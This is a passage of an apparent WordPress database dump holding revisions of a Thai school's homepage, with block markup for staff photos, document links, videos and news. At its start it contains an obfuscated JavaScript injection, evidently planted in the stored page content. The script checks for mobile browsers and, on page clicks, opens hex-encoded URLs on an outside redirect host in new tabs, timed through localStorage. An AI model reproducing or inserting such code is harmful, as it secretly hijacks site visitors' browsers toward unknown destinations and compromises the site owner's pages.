)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:28:01','2025-07-15 07:28:01','',19,'http://watprato.ssk.in.th/?p=679',0,'revision','',0),
(681,1,'2025-07-15 14:29:06','2025-07-15 07:29:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button 